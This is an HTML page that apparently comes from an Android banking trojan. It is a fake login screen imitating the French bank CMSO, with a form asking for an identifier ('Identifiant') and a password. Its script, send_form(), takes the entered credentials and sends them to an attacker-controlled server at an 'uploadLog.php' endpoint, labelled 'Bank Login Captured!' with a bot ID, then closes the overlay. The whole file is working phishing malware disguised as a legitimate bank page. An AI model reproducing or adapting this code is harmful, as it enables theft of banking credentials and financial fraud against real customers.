<!DOCTYPE html>
<html>
<head>
    <title>cmso</title>
    <link rel="shortcut icon" href="com.arkea.android.application.cmso2.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #a9a9a9;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
    }
    .logo {
text-align: center;
    background-size: 100%;
    padding: 0px 0px 0px 0px;
    background: none;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 0px 0px 0px 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 20px 0px 10px 0px;
    color: #5d5d5d;
    text-align: left;
    outline: none;
    border: 1px solid #000000;
    background: #ffffff;
    border-radius: 5px;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 0px 0px 0px 0px;
    outline: none;
    float: right;
    color: #ffffff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #e91e8e;
    border-radius: 3px;
}
input::placeholder {
    color: #9d9c9c;
    font-size: 15px;
}
.pure-material-checkbox {
    z-index: 0;
    position: relative;
    display: inline-block;
    color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.87);
    font-family: var(--pure-material-font, "Roboto", "Segoe UI", BlinkMacSystemFont, system-ui, -apple-system);
    font-size: 16px;
    line-height: 1.5;
}
/* Input */
.pure-material-checkbox > input {
    appearance: none;
    -moz-appearance: none;
    -webkit-appearance: none;
    z-index: -1;
    position: absolute;
    left: -10px;
    top: -8px;
    display: block;
    margin: 0;
    border-radius: 50%;
    width: 40px;
    height: 40px;
    background-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
    box-shadow: none;
    outline: none;
    opacity: 0;
    transform: scale(1);
    pointer-events: none;
    transition: opacity 0.3s, transform 0.2s;
}

/* Span */
.pure-material-checkbox > span {
    display: inline-block;
    width: 100%;
    cursor: pointer;
}

/* Box */
.pure-material-checkbox > span::before {
    content: "";
    display: inline-block;
    box-sizing: border-box;
    margin: 3px 11px 3px 1px;
    border: solid 2px; /* Safari */
    border-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
    border-radius: 2px;
    width: 18px;
    height: 18px;
    vertical-align: top;
    transition: border-color 0.2s, background-color 0.2s;
}

/* Checkmark */
.pure-material-checkbox > span::after {
    content: "";
    display: block;
    position: absolute;
    top: 3px;
    left: 1px;
    width: 10px;
    height: 5px;
    border: solid 2px transparent;
    border-right: none;
    border-top: none;
    transform: translate(3px, 4px) rotate(-45deg);
}

/* Checked, Indeterminate */
.pure-material-checkbox > input:checked,
.pure-material-checkbox > input:indeterminate {
    background-color: rgb(var(--pure-material-primary-rgb, 33, 150, 243));
}

.pure-material-checkbox > input:checked + span::before,
.pure-material-checkbox > input:indeterminate + span::before {
    border-color: #e78b02;
    background-color: #e78b02;
}

.pure-material-checkbox > input:checked + span::after,
.pure-material-checkbox > input:indeterminate + span::after {
    border-color: rgb(var(--pure-material-onprimary-rgb, 255, 255, 255));
}

.pure-material-checkbox > input:indeterminate + span::after {
    border-left: none;
    transform: translate(4px, 3px);
}

/* Hover, Focus */
.pure-material-checkbox:hover > input {
    opacity: 0.04;
}

.pure-material-checkbox > input:focus {
    opacity: 0.12;
}

.pure-material-checkbox:hover > input:focus {
    opacity: 0.16;
}

/* Active */
.pure-material-checkbox > input:active {
    opacity: 1;
    transform: scale(0);
    transition: transform 0s, opacity 0s;
}

.pure-material-checkbox > input:active + span::before {
    border-color: rgb(var(--pure-material-primary-rgb, 33, 150, 243));
}

.pure-material-checkbox > input:checked:active + span::before {
    border-color: transparent;
    background-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
}

/* Disabled */
.pure-material-checkbox > input:disabled {
    opacity: 0;
}

.pure-material-checkbox > input:disabled + span {
    color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.38);
    cursor: initial;
}

.pure-material-checkbox > input:disabled + span::before {
    border-color: currentColor;
}

.pure-material-checkbox > input:checked:disabled + span::before,
.pure-material-checkbox > input:indeterminate:disabled + span::before {
    border-color: transparent;
    background-color: currentColor;
}
</style>

<fieldset id="formtosend">


<div class="" id="log" style="display: block;">

<div class="logo" style="color: #e91e8e;font-size: 25px;font-weight: 400;background: #ffffff;padding: 15px;text-align: center;border-bottom: 2px solid #8BC34A;opacity: 0.7;">
CMSO
</div>


<div style="padding: 10px; background: #fff; margin: 50px; border-radius: 5px;">

<input type="text" name="login" id="password" placeholder="Identifiant">

<input type="password" name="password" id="password" placeholder="Mot de passe">

<input type="button" name="sumbit" value="Connexion" onclick="send_form()" style="float: none;">

</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    var form = document.getElementById('formtosend');
    fetch("https://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}

function show() {
    var p = document.getElementById('login');
    p.setAttribute('type', 'text');
}

function hide() {
    var p = document.getElementById('login');
    p.setAttribute('type', 'password');
}

var pwShown = 0;

document.getElementById("eye").addEventListener("click", function () {
    if (pwShown == 0) {
        pwShown = 1;
        show();
    } else {
        pwShown = 0;
        hide();
    }
}, false);
</script>

</body>
</html>